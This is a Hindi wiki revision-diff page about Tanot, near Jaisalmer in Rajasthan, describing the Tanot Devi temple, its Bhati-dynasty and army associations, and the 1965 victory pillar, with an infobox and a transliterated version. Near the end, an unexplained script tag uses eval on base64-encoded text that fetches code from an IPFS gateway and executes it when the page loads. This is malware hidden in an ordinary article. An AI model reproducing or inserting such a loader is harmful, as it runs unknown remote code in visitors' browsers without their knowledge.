Difference between revisions of "तनोट जैसलमेर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "॰" to ".")
 
(11 intermediate revisions by 6 users not shown)
Line 1: Line 1:
[[जैसलमेर]] [[राजस्थान]] का सबसे ख़ूबसूरत शहर है और [[जैसलमेर पर्यटन]] का सबसे आकर्षक स्थल माना जाता है। तनोट जैसलमेर से लगभग 120 किमी. दूर स्थित है। यहाँ पर तनोट देवी का मंदिर है, जो जैसलमेर के भूतपूर्व भाटी शासकों की कुल देवी मानी जाती हैं। भूतपूर्व रियासत के शासकों की प्राचीनतम राजधानी होने का तनोट को गौरव प्राप्त हैं। वर्तमान मे इस देवी मंदिर में सेना तथा सीमासुरक्षा बल के जवान पूजा करते हैं, यह जैसलमेर के सेना के जवानों की देवी के रूप में विख्यात हैं। इन देवी को थार की वैष्णों देवी भी कहा जाता है। सन् 1965 ई. में तनोट में देवी मंदिर के सामने भारत और [[पाकिस्तान]] के बीच हुए युद्ध में [[भारत]] की विजय का प्रतीक विजय स्तम्भ भी स्थापित हैं।
+
{{सूचना बक्सा पर्यटन
 
+
|चित्र=Tanot.jpg
==सम्बंधित लिंक==
+
|चित्र का नाम=तनोट देवी का मंदिर, [[जैसलमेर]]
 +
|विवरण=तनोट [[राजस्थान]] राज्य के [[जैसलमेर]] से लगभग 120 किमी दूर स्थित है। यहाँ पर तनोट देवी का मंदिर है, जो जैसलमेर के भूतपूर्व भाटी शासकों की कुल देवी मानी जाती हैं।
 +
|राज्य=[[राजस्थान]]
 +
|केन्द्र शासित प्रदेश=
 +
|ज़िला=[[जैसलमेर]]
 +
|निर्माता=
 +
|स्वामित्व=
 +
|प्रबंधक=
 +
|निर्माण काल=
 +
|स्थापना=
 +
|भौगोलिक स्थिति=
 +
|मार्ग स्थिति=
 +
|प्रसिद्धि=
 +
|कब जाएँ=[[अक्टूबर]] से [[मार्च]]
 +
|यातायात=ऑटो रिक्शा या टैक्सी
 +
|हवाई अड्डा=
 +
|रेलवे स्टेशन=जैसलमेर रेलवे स्टेशन
 +
|बस अड्डा=बस अड्डा जैसलमेर
 +
|कैसे पहुँचें=ऑटो रिक्शा या टैक्सी
 +
|क्या देखें=
 +
|कहाँ ठहरें=
 +
|क्या खायें=
 +
|क्या ख़रीदें=
 +
|एस.टी.डी. कोड=02992 (जैसलमेर)
 +
|ए.टी.एम=
 +
|सावधानी=
 +
|मानचित्र लिंक=[https://www.google.co.in/maps/dir/Tanot,+Rajasthan/New+Delhi,+Delhi/@27.8813878,71.5356584,7z/data=!3m1!4b1!4m13!4m12!1m5!1m1!1s0x3937861e8ef524c5:0x45b7bdbdad987f37!2m2!1d70.3554121!2d27.7954339!1m5!1m1!1s0x390cfd5b347eb62d:0x52c2b7494e204dce!2m2!1d77.2090212!2d28.6139391?hl=en गूगल मानचित्र]
 +
|संबंधित लेख=[[जैसलमेर का क़िला]] [[कलात्मक हवेलियाँ जैसलमेर|हवेलियाँ]]
 +
|पाठ 1=
 +
|शीर्षक 1=
 +
|पाठ 2=
 +
|शीर्षक 2=
 +
|अन्य जानकारी=
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन=
 +
}}
 +
'''तनोट''' [[राजस्थान]] राज्य के [[जैसलमेर]] से लगभग 120 किमी दूर स्थित है।  
 +
*यहाँ पर तनोट देवी का मंदिर है, जो जैसलमेर के भूतपूर्व भाटी शासकों की कुल देवी मानी जाती हैं।  
 +
*भूतपूर्व रियासत के शासकों की प्राचीनतम राजधानी होने का तनोट को गौरव प्राप्त हैं।  
 +
*वर्तमान में इस देवी मंदिर में सेना तथा सीमासुरक्षा बल के जवान पूजा करते हैं, यह जैसलमेर के सेना के जवानों की देवी के रूप में विख्यात हैं। इन देवी को '''थार की वैष्णों देवी''' भी कहा जाता है।  
 +
*सन् 1965 ई. में तनोट में देवी मंदिर के सामने [[भारत]] और [[पाकिस्तान]] के बीच हुए युद्ध में भारत की विजय का प्रतीक '''विजय स्तम्भ''' भी स्थापित हैं।
 +
 +
{{लेख प्रगति
 +
|आधार=
 +
|प्रारम्भिक=प्रारम्भिक1
 +
|माध्यमिक=
 +
|पूर्णता=
 +
|शोध=
 +
}}
 +
==संबंधित लेख==
 
{{राजस्थान के पर्यटन स्थल}}
 
{{राजस्थान के पर्यटन स्थल}}
 
 
[[Category:जैसलमेर]]
 
[[Category:जैसलमेर]]
 
[[Category:राजस्थान]]
 
[[Category:राजस्थान]]
 
[[Category:राजस्थान_के_पर्यटन_स्थल]]
 
[[Category:राजस्थान_के_पर्यटन_स्थल]]
 +
[[Category: राजस्थान के धार्मिक स्थल]]
 +
[[Category:हिन्दू धार्मिक स्थल]]
 +
[[Category:धार्मिक स्थल कोश]]
 
[[Category:पर्यटन_कोश]]
 
[[Category:पर्यटन_कोश]]
 
__INDEX__
 
__INDEX__

Latest revision as of 08:25, 31 August 2016

tanot jaisalamer
[[chitr:Tanot.jpg|tanot devi ka mandir, jaisalamer|200px|center]]
vivaran tanot rajasthan rajy ke jaisalamer se lagabhag 120 kimi door sthit hai. yahaan par tanot devi ka mandir hai, jo jaisalamer ke bhootapoorv bhati shasakoan ki kul devi mani jati haian.
rajy rajasthan
zila jaisalamer
kab jaean aktoobar se march
kaise pahuanchean aauto riksha ya taiksi
relave steshan jaisalamer relave steshan
bas adda bas adda jaisalamer
yatayat aauto riksha ya taiksi
es.ti.di. kod 02992 (jaisalamer)
chitr:Map-icon.gif googal manachitr
sanbandhit lekh jaisalamer ka qila haveliyaan


tanot rajasthan rajy ke jaisalamer se lagabhag 120 kimi door sthit hai.

  • yahaan par tanot devi ka mandir hai, jo jaisalamer ke bhootapoorv bhati shasakoan ki kul devi mani jati haian.
  • bhootapoorv riyasat ke shasakoan ki prachinatam rajadhani hone ka tanot ko gaurav prapt haian.
  • vartaman mean is devi mandir mean sena tatha simasuraksha bal ke javan pooja karate haian, yah jaisalamer ke sena ke javanoan ki devi ke roop mean vikhyat haian. in devi ko thar ki vaishnoan devi bhi kaha jata hai.
  • sanh 1965 ee. mean tanot mean devi mandir ke samane bharat aur pakistan ke bich hue yuddh mean bharat ki vijay ka pratik vijay stambh bhi sthapit haian.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh